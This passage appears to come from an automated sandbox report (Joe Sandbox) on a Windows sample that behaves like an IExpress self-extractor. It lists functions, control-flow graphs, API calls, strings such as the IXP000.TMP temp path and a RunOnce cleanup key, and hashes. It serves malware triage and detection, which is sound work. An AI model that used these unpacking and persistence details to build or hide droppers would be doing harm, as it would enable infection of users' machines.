                                                                                          • Associated: 00000000.00000002.1572489641.00007FF681C2C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1572507003.00007FF681C2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ff681c20000_0XVZC3kfwL.jbxd
                                                                                          Similarity
                                                                                          • API ID: Resource$FindLoad$CreateEventmemset$CloseErrorFreeHandleLastLockMessageMutexSizeofStringVersionmemcpy_s
                                                                                          • String ID: $EXTRACTOPT$INSTANCECHECK$TITLE$VERCHECK$gam
                                                                                          • API String ID: 3100096412-258196273
                                                                                          • Opcode ID: 8239ea3bc8d4f488818524f145e62419a79644bd439c5a8d4d2d204e9e9bee26
                                                                                          • Instruction ID: 506c442b0a8fa7500b7d42cfffb6578fd6f12f47d286e0dab3bb78b9e29c735b
                                                                                          • Opcode Fuzzy Hash: 8239ea3bc8d4f488818524f145e62419a79644bd439c5a8d4d2d204e9e9bee26
                                                                                          • Instruction Fuzzy Hash: 84814671A0C642C7FB609B65E8007BA26B0BF9D745F74703DD94EC66A1CFBCA545CA00
                                                                                          Function 00007FF681C26F14 Relevance: 24.7, APIs: 13, Strings: 1, Instructions: 218COMMON
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 398 7ff681c26f14-7ff681c26f59 399 7ff681c26f5b-7ff681c26f5e 398->399 400 7ff681c26f63-7ff681c26f8c GetCurrentDirectoryA SetCurrentDirectoryA 398->400 401 7ff681c27262-7ff681c27291 call 7ff681c286f0 399->401 402 7ff681c26fbb-7ff681c26ff6 GetDiskFreeSpaceA 400->402 403 7ff681c26f8e-7ff681c26fb6 call 7ff681c24f2c call 7ff681c27958 400->403 404 7ff681c271da-7ff681c2722f memset call 7ff681c27958 GetLastError FormatMessageA 402->404 405 7ff681c26ffc-7ff681c27024 MulDiv 402->405 424 7ff681c27260 403->424 416 7ff681c27234-7ff681c2725b call 7ff681c24f2c SetCurrentDirectoryA 404->416 405->404 408 7ff681c2702a-7ff681c27060 GetVolumeInformationA 405->408 413 7ff681c270c1-7ff681c270e5 SetCurrentDirectoryA 408->413 414 7ff681c27062-7ff681c270bc memset call 7ff681c27958 GetLastError FormatMessageA 408->414 418 7ff681c270e9-7ff681c270f0 413->418 414->416 416->424 422 7ff681c27103-7ff681c27116 418->422 423 7ff681c270f2-7ff681c270f7 418->423 427 7ff681c2711a-7ff681c2711d 422->427 423->422 426 7ff681c270f9-7ff681c27101 423->426 424->401 426->418 426->422 428 7ff681c2711f-7ff681c27128 427->428 429 7ff681c27150-7ff681c27157 427->429 428->427 432 7ff681c2712a 428->432 430 7ff681c27186-7ff681c27197 429->430 431 7ff681c27159-7ff681c27161 429->431 434 7ff681c2719a-7ff681c271a2 430->434 431->430 433 7ff681c27163-7ff681c27184 431->433 432->429 435 7ff681c2712c-7ff681c2714b call 7ff681c24f2c 432->435 433->434 436 7ff681c271be-7ff681c271c1 434->436 437 7ff681c271a4-7ff681c271a8 434->437 435->424 440 7ff681c271c7-7ff681c271ca 436->440 441 7ff681c271c3-7ff681c271c5 436->441 439 7ff681c271aa 437->439 443 7ff681c271cc-7ff681c271d5 439->443 444 7ff681c271ac-7ff681c271b9 call 7ff681c22520 439->444 440->439 441->439 443->401 444->401
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1572456169.00007FF681C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF681C20000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1572432836.00007FF681C20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1572474043.00007FF681C29000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1572489641.00007FF681C2C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1572507003.00007FF681C2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ff681c20000_0XVZC3kfwL.jbxd
                                                                                          Similarity
                                                                                          • API ID: CurrentDirectory
                                                                                          • String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\
                                                                                          • API String ID: 1611563598-4151094324
                                                                                          • Opcode ID: 4ad38f15274453923d8ffc4da5624aa26f0d8b3708517ab344ed8549bc082ecb
                                                                                          • Instruction ID: c085b6e05f77373fb8da318a750232fb716d89655802d1b3e38c61acb81a1467
                                                                                          • Opcode Fuzzy Hash: 4ad38f15274453923d8ffc4da5624aa26f0d8b3708517ab344ed8549bc082ecb
                                                                                          • Instruction Fuzzy Hash: 07A14B76A18742C7E7608B60E4806AABBB2FF9D744F646139EA4D83B94DF7CD405CB00
                                                                                          Function 00007FF681C25F80 Relevance: 24.6, APIs: 12, Strings: 2, Instructions: 124windowCOMMON
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1572456169.00007FF681C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF681C20000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1572432836.00007FF681C20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1572474043.00007FF681C29000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1572489641.00007FF681C2C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1572507003.00007FF681C2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ff681c20000_0XVZC3kfwL.jbxd
                                                                                          Similarity
                                                                                          • API ID: Resource$Find$FreeItemLoadLockShowWindow$MessageSendSizeofmemcpy_s
                                                                                          • String ID: *MEMCAB$CABINET
                                                                                          • API String ID: 1305606123-2642027498
                                                                                          • Opcode ID: 6bf8904781781a785fe026ead6335db9de58d868f56285484be7c9c0d168fa2d
                                                                                          • Instruction ID: 8a14df7d6f02a02af3610b23b25bca95addae932096bce690285d71f4ab03dbf
                                                                                          • Opcode Fuzzy Hash: 6bf8904781781a785fe026ead6335db9de58d868f56285484be7c9c0d168fa2d
                                                                                          • Instruction Fuzzy Hash: 8D510671A08B92C7EB509B50E8552BA7AB0FF8D745FA4A13DD94E82765DFBCE004CB40
                                                                                          Function 00007FF681C23214 Relevance: 17.7, APIs: 7, Strings: 3, Instructions: 152libraryfileloaderCOMMON
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 501 7ff681c23214-7ff681c2323c 502 7ff681c23269-7ff681c23270 call 7ff681c261d4 501->502 503 7ff681c2323e-7ff681c23244 501->503 512 7ff681c23276-7ff681c2327d call 7ff681c268f0 502->512 513 7ff681c23368 502->513 504 7ff681c23246 call 7ff681c26294 503->504 505 7ff681c2325c-7ff681c23263 call 7ff681c24064 503->505 510 7ff681c2324b-7ff681c2324d 504->510 505->502 505->513 510->513 514 7ff681c23253-7ff681c2325a 510->514 512->513 519 7ff681c23283-7ff681c232c5 GetSystemDirectoryA call 7ff681c27e08 LoadLibraryA 512->519 516 7ff681c2336a-7ff681c2338a call 7ff681c286f0 513->516 514->502 514->505 523 7ff681c232c7-7ff681c232e0 GetProcAddress 519->523 524 7ff681c232fb-7ff681c23310 FreeLibrary 519->524 523->524 525 7ff681c232e2-7ff681c232f5 DecryptFileA 523->525 526 7ff681c23316-7ff681c2331c 524->526 527 7ff681c233a5-7ff681c233ba SetCurrentDirectoryA 524->527 525->524 526->527 530 7ff681c23322-7ff681c2333d GetWindowsDirectoryA 526->530 528 7ff681c233bc-7ff681c233c1 527->528 529 7ff681c233c3-7ff681c233c9 527->529 531 7ff681c23344-7ff681c23362 call 7ff681c24f2c call 7ff681c27958 528->531 532 7ff681c2345f-7ff681c23467 529->532 533 7ff681c233cf-7ff681c233d6 529->533 534 7ff681c2338c-7ff681c2339c call 7ff681c26f14 530->534 535 7ff681c2333f 530->535 531->513 537 7ff681c23469-7ff681c2346b 532->537 538 7ff681c2347b 532->538 539 7ff681c233db-7ff681c233e9 533->539 541 7ff681c233a1-7ff681c233a3 534->541 535->531 537->538 542 7ff681c2346d-7ff681c23474 call 7ff681c223c0 537->542 545 7ff681c2347d-7ff681c2348b 538->545 539->539 543 7ff681c233eb-7ff681c233f2 539->543 541->513 541->527 554 7ff681c23479 542->554 547 7ff681c2342d call 7ff681c25f80 543->547 548 7ff681c233f4-7ff681c233fb 543->548 550 7ff681c234a8-7ff681c234af 545->550 551 7ff681c2348d-7ff681c23493 545->551 561 7ff681c23432 547->561 548->547 555 7ff681c233fd-7ff681c2342b call 7ff681c27d28 548->555 552 7ff681c234ba-7ff681c234bf 550->552 553 7ff681c234b1-7ff681c234b3 550->553 551->550 558 7ff681c23495 call 7ff681c241b4 551->558 552->516 553->552 559 7ff681c234b5 call 7ff681c24a54 553->559 554->545 563 7ff681c23434 555->563 564 7ff681c2349a-7ff681c2349c 558->564 559->552 561->563 567 7ff681c23436-7ff681c23440 563->567 568 7ff681c23445-7ff681c23453 call 7ff681c27984 563->568 564->513 569 7ff681c234a2 564->569 567->513 568->513 572 7ff681c23459 568->572 569->550 572->532
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1572456169.00007FF681C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF681C20000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1572432836.00007FF681C20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1572474043.00007FF681C29000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1572489641.00007FF681C2C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1572507003.00007FF681C2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ff681c20000_0XVZC3kfwL.jbxd
                                                                                          Similarity
                                                                                          • API ID: DirectoryLibrary$AddressAllocDecryptFileFreeLoadLocalProcSystemWindows
                                                                                          • String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\$DecryptFileA$advapi32.dll
                                                                                          • API String ID: 3010855178-3008067379
                                                                                          • Opcode ID: 56ef3f4b7feec16b998466a8266caa081bf801e29d979708740ab20d7bae988f
                                                                                          • Instruction ID: 61683dc366bd91bf5d25a564626e598ff372cf45a099e8379e1a88304adbaef8
                                                                                          • Opcode Fuzzy Hash: 56ef3f4b7feec16b998466a8266caa081bf801e29d979708740ab20d7bae988f
                                                                                          • Instruction Fuzzy Hash: 23710561E0C642C7FB619B24E8412B92AB0BF9D790F70703DD94DC62A1DFBCE985CA15
                                                                                          Function 00007FF681C26710 Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 121COMMON
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 573 7ff681c26710-7ff681c2673c 574 7ff681c2680b-7ff681c2681a 573->574 575 7ff681c26742-7ff681c26747 call 7ff681c265a8 573->575 577 7ff681c2681d-7ff681c26827 574->577 578 7ff681c2674c-7ff681c2674e 575->578 579 7ff681c26829-7ff681c2682f 577->579 580 7ff681c2683c-7ff681c26847 577->580 581 7ff681c268c0 578->581 582 7ff681c26754-7ff681c2676a 578->582 579->580 583 7ff681c26831-7ff681c2683a 579->583 584 7ff681c2684a-7ff681c26854 call 7ff681c26d9c 580->584 586 7ff681c268c2-7ff681c268e6 call 7ff681c286f0 581->586 585 7ff681c2676d-7ff681c26777 582->585 583->577 583->580 596 7ff681c26856-7ff681c26869 CreateDirectoryA 584->596 597 7ff681c26875-7ff681c2687d call 7ff681c26f14 584->597 588 7ff681c26779-7ff681c2677f 585->588 589 7ff681c2678c-7ff681c267a1 585->589 588->589 592 7ff681c26781-7ff681c2678a 588->592 593 7ff681c267f8-7ff681c26809 call 7ff681c27e08 589->593 594 7ff681c267a3-7ff681c267bb GetSystemInfo 589->594 592->585 592->589 593->584 602 7ff681c267e7 594->602 603 7ff681c267bd-7ff681c267c0 594->603 598 7ff681c2686b 596->598 599 7ff681c26894-7ff681c2689f call 7ff681c27958 596->599 605 7ff681c26882-7ff681c26884 597->605 598->597 599->581 604 7ff681c267ee-7ff681c267f3 call 7ff681c27e08 602->604 608 7ff681c267de-7ff681c267e5 603->608 609 7ff681c267c2-7ff681c267c5 603->609 604->593 611 7ff681c26886-7ff681c26892 605->611 612 7ff681c268a1-7ff681c268a8 605->612 608->604 614 7ff681c267c7-7ff681c267ca 609->614 615 7ff681c267d5-7ff681c267dc 609->615 611->586 612->581 616 7ff681c268aa-7ff681c268bb RemoveDirectoryA 612->616 614->593 617 7ff681c267cc-7ff681c267d3 614->617 615->604 616->581 617->604
                                                                                          APIs
                                                                                          • CreateDirectoryA.KERNEL32(?,?,?,?,?,?,0000000A,00007FF681C22E07), ref: 00007FF681C2685B
                                                                                            • Part of subcall function 00007FF681C265A8: RemoveDirectoryA.KERNELBASE(0000000A,00007FF681C22E07), ref: 00007FF681C26643
                                                                                            • Part of subcall function 00007FF681C265A8: GetFileAttributesA.KERNELBASE ref: 00007FF681C26652
                                                                                            • Part of subcall function 00007FF681C265A8: GetTempFileNameA.KERNEL32 ref: 00007FF681C2667F
                                                                                            • Part of subcall function 00007FF681C265A8: DeleteFileA.KERNEL32 ref: 00007FF681C26697
                                                                                            • Part of subcall function 00007FF681C265A8: CreateDirectoryA.KERNEL32 ref: 00007FF681C266A8
                                                                                          • GetSystemInfo.KERNEL32(?,?,?,?,?,?,0000000A,00007FF681C22E07), ref: 00007FF681C267A8
                                                                                          • RemoveDirectoryA.KERNEL32(?,?,?,?,?,?,0000000A,00007FF681C22E07), ref: 00007FF681C268B4
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1572456169.00007FF681C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF681C20000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1572432836.00007FF681C20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1572474043.00007FF681C29000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1572489641.00007FF681C2C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1572507003.00007FF681C2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ff681c20000_0XVZC3kfwL.jbxd
                                                                                          Similarity
                                                                                          • API ID: Directory$File$CreateRemove$AttributesDeleteInfoNameSystemTemp
                                                                                          • String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\$alpha$i386$mips$ppc
                                                                                          • API String ID: 1979080616-1381881128
                                                                                          • Opcode ID: 201d07170fcdefcbc0f83a1d7943c8f01de40c2b2ab8886ba132bb97e87172f4
                                                                                          • Instruction ID: c5dd1edd7e2f070084bda42942881e1f43a0b05995c579095e58383f5db9ddde
                                                                                          • Opcode Fuzzy Hash: 201d07170fcdefcbc0f83a1d7943c8f01de40c2b2ab8886ba132bb97e87172f4
                                                                                          • Instruction Fuzzy Hash: 22514BA1A08692C3FB558B15F8142B967B0BF5DB81FB86039CD4DC2691DFBDE809C360
                                                                                          Function 00007FF681C22D70 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 85libraryloadershutdownCOMMON
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1572456169.00007FF681C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF681C20000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1572432836.00007FF681C20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1572474043.00007FF681C29000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1572489641.00007FF681C2C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1572507003.00007FF681C2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ff681c20000_0XVZC3kfwL.jbxd
                                                                                          Similarity
                                                                                          • API ID: Handle$AddressCloseExitModuleProcVersionWindows
                                                                                          • String ID: @$HeapSetInformation$Kernel32.dll
                                                                                          • API String ID: 1302179841-1204263913
                                                                                          • Opcode ID: 2f7390ff0c0d46cb9cdc5e9bd2078a34bdbe19e23de9cb8625d4c9295115e43e
                                                                                          • Instruction ID: 7e8480fb273938d5d9f2d261984605e74008d52bfa940a7acb610d6062ceb693
                                                                                          • Opcode Fuzzy Hash: 2f7390ff0c0d46cb9cdc5e9bd2078a34bdbe19e23de9cb8625d4c9295115e43e
                                                                                          • Instruction Fuzzy Hash: 8B412A71E08652C7FBA49B61E8412B976B0BF9DB81F74A13DDA1DC2295DFBCE444C600
                                                                                          Function 00007FF681C22034 Relevance: 12.1, APIs: 8, Instructions: 121filestringCOMMON
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1572456169.00007FF681C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF681C20000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1572432836.00007FF681C20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1572474043.00007FF681C29000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1572489641.00007FF681C2C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1572507003.00007FF681C2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ff681c20000_0XVZC3kfwL.jbxd
                                                                                          Similarity
                                                                                          • API ID: File$Find$lstrcmp$AttributesCloseDeleteDirectoryFirstNextRemove
                                                                                          • String ID:
                                                                                          • API String ID: 836429354-0
                                                                                          • Opcode ID: 91cc5e1a10547be1af5b881470c4a552975bb6d87df7be44110ed190adb22146
                                                                                          • Instruction ID: dfa74bab08dbbdacf706f0f2b557673943535e3df38a9c1d09fe781c886ea06e
                                                                                          • Opcode Fuzzy Hash: 91cc5e1a10547be1af5b881470c4a552975bb6d87df7be44110ed190adb22146
                                                                                          • Instruction Fuzzy Hash: E4517C72618B86DAEB518F20D8442F977B1FF4AB94FA4A175DA1D83685DF3CE909C300
                                                                                          Function 00007FF681C263DC Relevance: 19.3, APIs: 8, Strings: 3, Instructions: 97registryfileCOMMON
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1572456169.00007FF681C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF681C20000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1572432836.00007FF681C20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1572474043.00007FF681C29000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1572489641.00007FF681C2C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1572507003.00007FF681C2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ff681c20000_0XVZC3kfwL.jbxd
                                                                                          Similarity
                                                                                          • API ID: DeleteFileFreeLocal$AttributesCloseCurrentDirectoryOpenValue
                                                                                          • String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\$Software\Microsoft\Windows\CurrentVersion\RunOnce$wextract_cleanup0
                                                                                          • API String ID: 3049360512-2700888539
                                                                                          • Opcode ID: 412a7dec44b3798a2430baef0d9910c820e9379bb72a94b578006faa3a53e04f
                                                                                          • Instruction ID: 2f29d7f6a2987d213407aaf4f2421313707a18ee82be84cc6142ee528daf7c85
                                                                                          • Opcode Fuzzy Hash: 412a7dec44b3798a2430baef0d9910c820e9379bb72a94b578006faa3a53e04f
                                                                                          • Instruction Fuzzy Hash: 16513871A08A92C7EB518B10E8543B977B0FF9DB46FA46139DA4E836A4CF7CE448C740
                                                                                          Function 00007FF681C24838 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 119processsynchronizationCOMMON
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1572456169.00007FF681C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF681C20000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1572432836.00007FF681C20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1572474043.00007FF681C29000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1572489641.00007FF681C2C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1572507003.00007FF681C2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ff681c20000_0XVZC3kfwL.jbxd
                                                                                          Similarity
                                                                                          • API ID: CloseHandleProcess$CodeCreateExitObjectSingleWait
                                                                                          • String ID:
                                                                                          • API String ID: 976364251-3916222277
                                                                                          • Opcode ID: 67f5a8c114559d55dd8cf19d65e8c653d15ae20e01125bbcfa2d4a6a434563c8
                                                                                          • Instruction ID: 923374b68ed5b46bc96bab67bcc4a2cec48c7f686e341a53e5ba24e646b91fec
                                                                                          • Opcode Fuzzy Hash: 67f5a8c114559d55dd8cf19d65e8c653d15ae20e01125bbcfa2d4a6a434563c8
                                                                                          • Instruction Fuzzy Hash: 48515F72A18A82C7F7609B10E454379BBB0FF9D755F246139E94D826A8CFBCD444CB00
                                                                                          Function 00007FF681C265A8 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 88fileCOMMON
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1572456169.00007FF681C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF681C20000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1572432836.00007FF681C20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1572474043.00007FF681C29000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1572489641.00007FF681C2C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1572507003.00007FF681C2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ff681c20000_0XVZC3kfwL.jbxd
                                                                                          Similarity
                                                                                          • API ID: File$Directory$AttributesCreateDeleteNameRemoveTemp
                                                                                          • String ID: IXP$IXP%03d.TMP
                                                                                          • API String ID: 4001122843-3932986939
                                                                                          • Opcode ID: cd7b86485b10685b83dcd6330150a770b90a6da73959a3ca5b2625007923a5f8
                                                                                          • Instruction ID: 73751bad6154fc8970773c3158d9a9fe882c07f126b6e052c7f62770639ff548
                                                                                          • Opcode Fuzzy Hash: cd7b86485b10685b83dcd6330150a770b90a6da73959a3ca5b2625007923a5f8
                                                                                          • Instruction Fuzzy Hash: 9B316D71708A91C7EB209B11E9502B97AB1FF8EB81F65A139DE4E83795CF3CD405C610
                                                                                          Function 00007FF681C28460 Relevance: 12.1, APIs: 8, Instructions: 138sleepCOMMON
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 697 7ff681c28460-7ff681c284a9 call 7ff681c28bf4 GetStartupInfoW 701 7ff681c284ab-7ff681c284b6 697->701 702 7ff681c284b8-7ff681c284bb 701->702 703 7ff681c284c2-7ff681c284cb 701->703 706 7ff681c284bd 702->706 707 7ff681c284da-7ff681c284e5 Sleep 702->707 704 7ff681c284e7-7ff681c284ef 703->704 705 7ff681c284cd-7ff681c284d5 _amsg_exit 703->705 709 7ff681c284f1-7ff681c2850e 704->709 710 7ff681c28554 704->710 708 7ff681c2855e-7ff681c28567 705->708 706->703 707->701 712 7ff681c28569-7ff681c2857c _initterm 708->712 713 7ff681c28586-7ff681c28588 708->713 711 7ff681c28512-7ff681c28515 709->711 710->708 716 7ff681c28546-7ff681c28548 711->716 717 7ff681c28517-7ff681c28519 711->717 712->713 714 7ff681c2858a-7ff681c2858c 713->714 715 7ff681c28593-7ff681c2859b 713->715 714->715 718 7ff681c2859d-7ff681c285ab call 7ff681c28b60 715->718 719 7ff681c285d1-7ff681c285e0 715->719 716->708 720 7ff681c2854a-7ff681c2854f 716->720 717->720 721 7ff681c2851b-7ff681c2851f 717->721 718->719 730 7ff681c285ad-7ff681c285c7 718->730 725 7ff681c285e4-7ff681c285ea 719->725 726 7ff681c286bb-7ff681c286d0 720->726 723 7ff681c2853b-7ff681c28544 721->723 724 7ff681c28521-7ff681c28537 721->724 723->711 724->723 728 7ff681c285ec-7ff681c285ee 725->728 729 7ff681c2865d-7ff681c28660 725->729 734 7ff681c285f0-7ff681c285f2 728->734 735 7ff681c285f4-7ff681c285f9 728->735 731 7ff681c2866f-7ff681c28677 _ismbblead 729->731 732 7ff681c28662-7ff681c2866b 729->732 730->719 736 7ff681c28679-7ff681c2867c 731->736 737 7ff681c28681-7ff681c28689 731->737 732->731 734->729 734->735 738 7ff681c28607-7ff681c2863c call 7ff681c22d70 735->738 739 7ff681c285fb-7ff681c28605 735->739 736->737 737->725 737->726 742 7ff681c28646-7ff681c2864d 738->742 743 7ff681c2863e-7ff681c28640 exit 738->743 739->735 744 7ff681c2865b 742->744 745 7ff681c2864f-7ff681c28655 _cexit 742->745 743->742 744->726 745->744
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1572456169.00007FF681C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF681C20000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1572432836.00007FF681C20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1572474043.00007FF681C29000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1572489641.00007FF681C2C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1572507003.00007FF681C2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ff681c20000_0XVZC3kfwL.jbxd
                                                                                          Similarity
                                                                                          • API ID: Current$CountTickTime$CounterFileImageInfoNonwritablePerformanceProcessQuerySleepStartupSystemThread_amsg_exit_cexit_initterm_ismbbleadexit
                                                                                          • String ID:
                                                                                          • API String ID: 2995914023-0
                                                                                          • Opcode ID: 452453f8cba86726c033ce9af079bec980333149c11a377a6a6421c59040ebf2
                                                                                          • Instruction ID: 40165836b2c216d72846bb9eeadfcbcc68557bd1860dce2cffafaf7094567c46
                                                                                          • Opcode Fuzzy Hash: 452453f8cba86726c033ce9af079bec980333149c11a377a6a6421c59040ebf2
                                                                                          • Instruction Fuzzy Hash: 7A611571A08646C7FBA09B22E89037A22F0FF4C794F64613DD94DC26A5DF3CE845D644
                                                                                          Function 00007FF681C26294 Relevance: 12.1, APIs: 5, Strings: 3, Instructions: 75memoryCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                            • Part of subcall function 00007FF681C251F8: FindResourceA.KERNEL32(?,?,00000000,00007FF681C22F6B), ref: 00007FF681C25220
                                                                                            • Part of subcall function 00007FF681C251F8: SizeofResource.KERNEL32(?,?,00000000,00007FF681C22F6B), ref: 00007FF681C25231
                                                                                            • Part of subcall function 00007FF681C251F8: FindResourceA.KERNEL32(?,?,00000000,00007FF681C22F6B), ref: 00007FF681C25257
                                                                                            • Part of subcall function 00007FF681C251F8: LoadResource.KERNEL32(?,?,00000000,00007FF681C22F6B), ref: 00007FF681C25268
                                                                                            • Part of subcall function 00007FF681C251F8: LockResource.KERNEL32(?,?,00000000,00007FF681C22F6B), ref: 00007FF681C25277
                                                                                            • Part of subcall function 00007FF681C251F8: memcpy_s.MSVCRT ref: 00007FF681C25296
                                                                                            • Part of subcall function 00007FF681C251F8: FreeResource.KERNEL32(?,?,00000000,00007FF681C22F6B), ref: 00007FF681C252A5
                                                                                          • LocalAlloc.KERNEL32(?,?,?,?,00000000,00007FF681C2324B), ref: 00007FF681C262B9
                                                                                          • LocalFree.KERNEL32 ref: 00007FF681C26332
                                                                                            • Part of subcall function 00007FF681C24F2C: LoadStringA.USER32 ref: 00007FF681C24FBC
                                                                                            • Part of subcall function 00007FF681C24F2C: MessageBoxA.USER32 ref: 00007FF681C24FFC
